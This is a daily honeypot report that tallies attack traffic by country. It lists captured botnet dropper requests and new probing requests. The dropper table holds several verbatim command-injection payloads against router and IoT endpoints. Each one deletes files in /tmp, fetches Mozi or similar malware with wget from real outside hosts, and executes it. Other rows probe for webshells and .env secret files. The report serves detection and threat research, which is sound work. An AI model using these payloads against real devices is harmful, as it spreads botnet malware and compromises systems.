Skip to main content
  1. Daily-Posts/

Report: 2025-07-16

·389 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-07-16
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 7 stage 1 IP address(es), linked to 5 dropper URL(s).

There are 17 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1071 requests were recorded during the day, originating from 7 different countries, with a peak of 372 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
DEGermany
USGermany
SGGermany
USDubai
USDubai
PTGeorgia

botnet_dropper_behaviour
#

remote_addrrequest
8.219.207.144GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
103.93.93.162GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.93.93.162:42053/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
182.40.118.5GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1
87.121.84.34GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://141.11.62.222/x/tplink+-O-
139.5.11.242GET /shell?cd+/tmp;rm+-rf+*;wget+http://139.5.11.242:40260/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
199.16.59.198GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://199.16.59.198:42575/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
8.219.212.37GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
136HEAD /?satori.ci/opt HTTP/1.1
414GET /webshell HTTP/1.1
434GET /shell.asp HTTP/1.1
1711\x00\x0E\x08e\x7F\xEEXCA\xD1\xDD\x00\x00\x00\x00\x00
1721\x00\x0E8e\x7F\xEEXCA\xD1\xDD\x00\x00\x00\x00\x00
1801GET /.env.zinerak HTTP/1.1
1811GET /.env-logfile HTTP/1.1
1921GET /.env-app.log HTTP/1.1
1971GET /.env.netlify HTTP/1.1
1981GET /.env-angular HTTP/1.1
1991GET /.env-ci.json HTTP/1.1
2621GET /socket.io/1/?t=1752680829846 HTTP/1.1
2901GET /odinhttpcall1752651464 HTTP/1.1
2921GET /OdinHttpCall1752651464 HTTP/1.1
2931GET /Odin/http/call1752651464 HTTP/1.1
3441POST /cgi-bin/admin.cgi HTTP/1.1
3451est/

country_iso_code
#

number_of_occurencecountry_iso_code
0372US
1118GB
298DE
380HK
475PL
551RU
647PT
733BG
829SC
925CN
1024NL
1120CA
1218SG
1312SE
147MU
157IN
166IL
176AE
186BE
194FR
204BR
214JP
223KZ
233TH
242VN
252IR
262IE
272MD
282ID
291AR
301CH
311IS
321PA
331KR
341GR
351AG
361KH
371AO

Related

Report: 2025-07-15
·597 words
Repport Daily
Report: 2025-07-14
·448 words
Repport Daily
Report: 2025-07-13
·322 words
Repport Daily